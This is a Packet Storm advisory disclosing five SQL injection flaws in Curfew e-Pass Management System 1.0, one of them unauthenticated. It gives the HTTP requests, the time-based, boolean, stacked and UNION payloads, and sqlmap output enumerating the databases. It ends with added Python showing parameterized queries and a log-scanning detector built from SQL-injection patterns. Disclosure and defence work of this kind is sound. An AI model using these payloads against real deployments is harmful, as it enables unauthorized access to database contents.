Curfew e-Pass Management System 1.0 SQL Injection

06 Aug 2020 00:00:00 · Reported by Mucahit Karadag · Type: packetstorm · Source: packetstormsecurity.com · 151 views

Curfew e-Pass Management System 1.0 SQL Injection Vulnerabilities

Code
`# Exploit Title: Curfew e-Pass Management System 1.0 Multiple SQL Injection Vulnerabilities  
# Google Dork: N/A  
# Date: 04.08.2020  
# Exploit Author: Mucahit Karadag  
# Vendor Homepage: https://products.phpgurukul.com/product/curfew-e-pass-management-system-project-report/  
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=11661  
# Version: 1.0  
# Tested on: Ubuntu Server 14.04.6 LTS  
# CVE : N/A  
  
###  
# Software Description:  
# Curfew Pass Management System is a web-based application that manages   
# the records of passes issued by the administration. Curfew Pass Management   
# System is an automated system that delivers data processing at very high   
# speed in a systematic manner.  
#  
# Vulnerability Description:  
# Curfew e-Pass Management System 1.0 web application is vulnerable to  
# 5 different SQL injection vulnerabilities in multiple endpoints.  
# Vulnerabilities are listed in detail below.  
#   
# In summary, vulnerabilities are  
# Unauthenticated SQL Injection Identified on searchdata Parameter  
# Authenticated SQL Injection Identified on editid Parameter  
# Authenticated SQL Injection Identified on fromdate Parameter  
# Authenticated SQL Injection Identified on searchdata Parameter  
# Authenticated SQL Injection Identified on viewid Parameter  
###  
  
##  
## [Unauthenticated SQL Injection Identified on searchdata Parameter]  
##  
  
POST /cpms/index.php HTTP/1.1  
Host: 12.0.0.163  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 22  
Origin: http://12.0.0.163  
DNT: 1  
Connection: close  
Referer: http://12.0.0.163/cpms/index.php  
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4  
Upgrade-Insecure-Requests: 1  
  
searchdata=&search=  
  
"searchdata" parameter is vulnerable to SQL injection under the search feature in the main page.  
  
Parameter: searchdata (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: searchdata=asd' AND (SELECT 1646 FROM (SELECT(SLEEP(5)))qasT) AND 'hZfX'='hZfX&search=  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 11 columns  
Payload: searchdata=asd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627071,0x624a58537255484d436f537963554473417772544758624364725249617a63534a564271704b756d,0x71766a6271),NULL,NULL,NULL,NULL-- -&search=  
---  
[09:52:09] [INFO] the back-end DBMS is MySQL  
web server operating system: Linux Ubuntu  
web application technology: Apache 2.4.7, PHP 5.5.9  
back-end DBMS: MySQL >= 5.0.12  
[09:52:10] [INFO] fetching database names  
available databases [5]:  
[*] cpms  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] phpmyadmin  
  
##  
## [Authenticated SQL Injection Identified on editid Parameter]  
##  
  
GET /cpms/admin/edit-category-detail.php?editid=1 HTTP/1.1  
Host: 12.0.0.163  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Referer: http://12.0.0.163/cpms/admin/manage-category.php  
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4  
Upgrade-Insecure-Requests: 1  
  
  
"editid" parameter is vulnerable to SQL injection on an HTTP GET request to the /admin/edit-category-detail.php endpoint.  
  
---  
Parameter: editid (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: editid=1 AND 4435=4435  
  
Type: stacked queries  
Title: MySQL >= 5.0.12 stacked queries (comment)  
Payload: editid=1;SELECT SLEEP(5)#  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: editid=1 AND (SELECT 2111 FROM (SELECT(SLEEP(5)))TtYi)  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 3 columns  
Payload: editid=1 UNION ALL SELECT NULL,CONCAT(0x7176707871,0x5a4e55767242794d476c47766f765a4a62704b54775074624e684745515a59626662504d46726f4a,0x716a6b7071),NULL-- -  
---  
[09:54:59] [INFO] testing MySQL  
[09:54:59] [INFO] confirming MySQL  
[09:54:59] [INFO] the back-end DBMS is MySQL  
web server operating system: Linux Ubuntu  
web application technology: Apache 2.4.7, PHP 5.5.9  
back-end DBMS: MySQL >= 5.0.0  
[09:54:59] [INFO] fetching database names  
available databases [5]:  
[*] cpms  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] phpmyadmin  
  
##  
## [Authenticated SQL Injection Identified on fromdate Parameter]  
##  
  
POST /cpms/admin/pass-bwdates-reports-details.php HTTP/1.1  
Host: 12.0.0.163  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 45  
Origin: http://12.0.0.163  
DNT: 1  
Connection: close  
Referer: http://12.0.0.163/cpms/admin/pass-bwdates-report.php  
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4  
Upgrade-Insecure-Requests: 1  
  
fromdate=2020-08-04&todate=2020-08-26&submit=  
  
---  
Parameter: fromdate (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: fromdate=2020-08-02' AND (SELECT 6843 FROM (SELECT(SLEEP(5)))eIgq) AND 'Vnjn'='Vnjn&todate=2020-08-27&submit=  
---  
[09:58:36] [INFO] testing MySQL  
[09:58:36] [INFO] confirming MySQL  
[09:58:36] [INFO] the back-end DBMS is MySQL  
web server operating system: Linux Ubuntu  
web application technology: Apache 2.4.7, PHP 5.5.9  
back-end DBMS: MySQL >= 5.0.0  
[09:58:36] [INFO] fetching database names  
[09:58:36] [INFO] fetching number of databases  
[09:58:36] [INFO] resumed: 5  
[09:58:36] [INFO] resuming partial value: informat  
[09:58:36] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)  
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]  
  
[09:58:46] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions  
[09:58:56] [INFO] adjusting time delay to 1 second due to good response times  
[09:59:37] [INFO] retrieved: cpms  
[09:59:37] [INFO] retrieved: information_schema  
[10:00:56] [INFO] retrieved: mysql  
[10:02:25] [INFO] retrieved: performance_schema  
[10:03:41] [INFO] retrieved: phpmyadmin  
available databases [5]:  
[*] cpms  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] phpmyadmin  
  
##  
## [Authenticated SQL Injection Identified on searchdata Parameter]  
##  
  
POST /cpms/admin/search-pass.php HTTP/1.1  
Host: 12.0.0.163  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 22  
Origin: http://12.0.0.163  
DNT: 1  
Connection: close  
Referer: http://12.0.0.163/cpms/admin/search-pass.php  
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4  
Upgrade-Insecure-Requests: 1  
  
searchdata=asd&search=  
  
---  
Parameter: searchdata (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: searchdata=123123123' AND (SELECT 8177 FROM (SELECT(SLEEP(5)))Hojp) AND 'vmxB'='vmxB&search=  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 11 columns  
Payload: searchdata=123123123' UNION ALL SELECT NULL,NULL,CONCAT(0x7162786a71,0x7174545a63634a4b774a7561487a75456a4b4f55554b6e57704f6342514a744e4643534d43724c56,0x717a6a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&search=  
---  
[10:10:57] [INFO] testing MySQL  
[10:10:57] [WARNING] reflective value(s) found and filtering out  
[10:10:57] [INFO] confirming MySQL  
[10:10:58] [INFO] the back-end DBMS is MySQL  
web server operating system: Linux Ubuntu  
web application technology: Apache 2.4.7, PHP 5.5.9  
back-end DBMS: MySQL >= 5.0.0  
[10:10:58] [INFO] fetching database names  
available databases [5]:  
[*] cpms  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] phpmyadmin  
  
  
##  
## [Authenticated SQL Injection Identified on viewid Parameter]  
##  
  
GET /cpms/admin/view-pass-detail.php?viewid=3 HTTP/1.1  
Host: 12.0.0.163  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Cookie: PHPSESSID=pskcl31tjpg4gsddvl4htrvsd4  
Upgrade-Insecure-Requests: 1  
Cache-Control: max-age=0  
  
---  
Parameter: viewid (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: viewid=3 AND 2054=2054  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: viewid=3 AND (SELECT 1904 FROM (SELECT(SLEEP(5)))VWYW)  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 11 columns  
Payload: viewid=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171787871,0x6c566b51504651727a68446f5077707646555a444466646c427470556b514e704179774e6b787661,0x71766a7871),NULL-- -  
---  
[10:12:27] [INFO] testing MySQL  
[10:12:27] [INFO] confirming MySQL  
[10:12:28] [INFO] the back-end DBMS is MySQL  
web server operating system: Linux Ubuntu  
web application technology: Apache 2.4.7, PHP 5.5.9  
back-end DBMS: MySQL >= 5.0.0  
[10:12:28] [INFO] fetching database names  
available databases [5]:  
[*] cpms  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] phpmyadmin  
`
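All five findings share one root cause: a request parameter (editid, viewid, searchdata, fromdate) is concatenated into a SQL string and so becomes part of the query grammar instead of staying data. The following Python is an added example written for this page, not code from the application or the advisory author: it rebuilds the editid lookup against an in-memory SQLite table (the table name, column names and rows are constructed stand-ins; the real schema is MySQL and is not shown on the page) and runs the page's boolean-based payload through a concatenated query, a parameterized query, and a validate-then-parameterize query, so the difference between the three is observable rather than asserted.

```python
import re
import sqlite3

# Constructed stand-in for the application's category table. The real schema
# is MySQL and is not on the page; table and column names here are invented.
SCHEMA = """
CREATE TABLE category (id INTEGER PRIMARY KEY, name TEXT);
INSERT INTO category (id, name) VALUES (1, 'Medical'), (2, 'Grocery');
"""


def open_db():
    """Fresh in-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, editid):
    """Builds the statement by string concatenation. The request parameter is
    parsed as SQL, which is the pattern behind every finding in the advisory."""
    sql = "SELECT id, name FROM category WHERE id=" + editid
    return conn.execute(sql).fetchone()


def lookup_parameterized(conn, editid):
    """Same query, but the value travels as a bound parameter. SQLite compares the
    whole string against the integer column; it is never parsed as SQL."""
    return conn.execute(
        "SELECT id, name FROM category WHERE id=?", (editid,)
    ).fetchone()


def lookup_validated(conn, editid):
    """Defence in depth: the id is known to be a decimal integer, so reject
    anything else before the database is touched, then bind the value."""
    if not re.fullmatch(r"[0-9]{1,9}", editid):
        raise ValueError("editid must be a decimal integer")
    return lookup_parameterized(conn, int(editid))


if __name__ == "__main__":
    db = open_db()
    # Payload shapes taken from the advisory's boolean-based finding.
    for value in ("1", "1 AND 4435=4435", "1 AND 4435=4436"):
        print(repr(value), "concatenated ->", lookup_vulnerable(db, value),
              "| parameterized ->", lookup_parameterized(db, value))
```

With concatenation, `1 AND 4435=4435` returns the same row as a plain `1` while `1 AND 4435=4436` returns nothing; that row-or-no-row difference is what the "boolean-based blind" entries in the sqlmap output refer to. The parameterized form returns nothing for either payload because the full string is compared as a value, and the validated form refuses it before any query is issued, which is the behaviour to look for when reviewing the patched endpoints.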
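The sqlmap output above records what the scanner sent; on the server side the same traffic is visible in the web server access log for the two GET-based findings (editid, viewid). The POST findings (searchdata, fromdate) carry the payload in the request body, which a default access log does not record, so those need body logging at a reverse proxy or WAF. The script below is an added detection example, not part of the advisory: it parses constructed Apache combined-log lines (client IPs and timestamps are invented; the query strings are URL-encoded forms of the payload shapes reported above) and flags any parameter whose decoded value contains SQL grammar, plus any value of the two id parameters that is not a plain decimal integer.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-log lines (not from the advisory). Spaces inside
# query strings are %20-encoded, as a browser or scanner would send them.
SAMPLE_LOG = """\
10.0.0.7 - - [04/Aug/2020:09:54:59 +0000] "GET /cpms/admin/edit-category-detail.php?editid=1 HTTP/1.1" 200 2311
10.0.0.7 - - [04/Aug/2020:09:55:01 +0000] "GET /cpms/admin/edit-category-detail.php?editid=1%20AND%204435%3D4435 HTTP/1.1" 200 2311
10.0.0.7 - - [04/Aug/2020:09:55:02 +0000] "GET /cpms/admin/edit-category-detail.php?editid=1%20AND%20(SELECT%202111%20FROM%20(SELECT(SLEEP(5)))TtYi) HTTP/1.1" 200 2311
10.0.0.7 - - [04/Aug/2020:10:12:28 +0000] "GET /cpms/admin/view-pass-detail.php?viewid=3%20UNION%20ALL%20SELECT%20NULL,NULL,NULL--%20- HTTP/1.1" 200 4102
10.0.0.9 - - [04/Aug/2020:10:13:00 +0000] "GET /cpms/admin/view-pass-detail.php?viewid=3 HTTP/1.1" 200 4102
"""

# Apache "combined" format up to the status code; the rest is not needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameters the advisory reports as injectable that the app uses as numeric ids.
NUMERIC_PARAMS = {"editid", "viewid"}

# Indicators that a value is being treated as SQL grammar rather than data.
SQL_INDICATORS = [
    ("sleep-call", re.compile(r"\bsleep\s*\(", re.I)),
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("tautology", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("comment-terminator", re.compile(r"(--|#|/\*)")),
]


def classify_value(name, value):
    """Return the sorted list of indicator labels that fire for one parameter value."""
    reasons = [label for label, rx in SQL_INDICATORS if rx.search(value)]
    if name in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
        reasons.append("non-numeric-id")
    return sorted(set(reasons))


def suspicious_requests(log_text):
    """Scan access-log text; yield (ip, path, parameter, reasons) per flagged value.
    parse_qsl URL-decodes values, so encoded payloads are inspected in clear."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        url = urlsplit(m.group("target"))
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            reasons = classify_value(name, value)
            if reasons:
                hits.append((m.group("ip"), url.path, name, reasons))
    return hits


if __name__ == "__main__":
    for ip, path, name, reasons in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} {path} param={name} reasons={','.join(reasons)}")
```

The non-numeric-id check is the most reliable signal here because it has no dependence on keyword lists: the application only ever uses editid and viewid as integers, so any other value is either a bug or probing. The keyword indicators are useful for the free-text searchdata and fromdate parameters once request bodies are available, but they will also fire on legitimate text that happens to contain a word like "union", so treat them as triage input rather than a blocking rule.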
